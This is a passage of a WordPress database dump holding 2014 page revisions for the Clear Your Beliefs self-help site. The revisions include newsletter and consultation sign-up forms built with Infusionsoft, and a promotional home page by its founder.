13:18:23', '2014-10-28 18:18:23', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1638, 2, '2014-10-28 13:21:46', '2014-10-28 18:21:46', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" /><input name="inf_form_name" type="hidden" value="Sign up for newsletter" /> <input name="infusionsoft_version" type="hidden" value="1.34.0.44" /> <div class="infusion-field"> <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:21:46', '2014-10-28 18:21:46', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1636, 2, '2014-10-28 13:19:03', '2014-10-28 18:19:03', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" />\r\n    <input name="inf_form_name" type="hidden" value="Sign up for newsletter" />\r\n    <input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n    <div class="infusion-field">\r\n        <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center></div>\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n<input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="GET ACCESS NOW" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:19:03', '2014-10-28 18:19:03', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1637, 2, '2014-10-28 13:20:40', '2014-10-28 18:20:40', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" /><input name="inf_form_name" type="hidden" value="Sign up for newsletter" /> <input name="infusionsoft_version" type="hidden" value="1.34.0.44" /> <div class="infusion-field"> <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center></div>\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n<input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="GET ACCESS NOW" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:20:40', '2014-10-28 18:20:40', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1641, 2, '2014-10-28 18:15:29', '2014-10-28 23:15:29', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nSchedule your free consultation now:  \r\n\r\n<iframe width="750" height="600" src="https://my.timedriver.com/P4T2P?sh=1" frameborder="0"></iframe>\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 650px;">\r\n\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;">\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</form>\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-10-28 18:15:29', '2014-10-28 23:15:29', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1642, 2, '2014-11-02 16:25:05', '2014-11-02 21:25:05', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-02 16:25:05', '2014-11-02 21:25:05', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1643, 2, '2014-11-03 11:58:14', '2014-11-03 16:58:14', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – 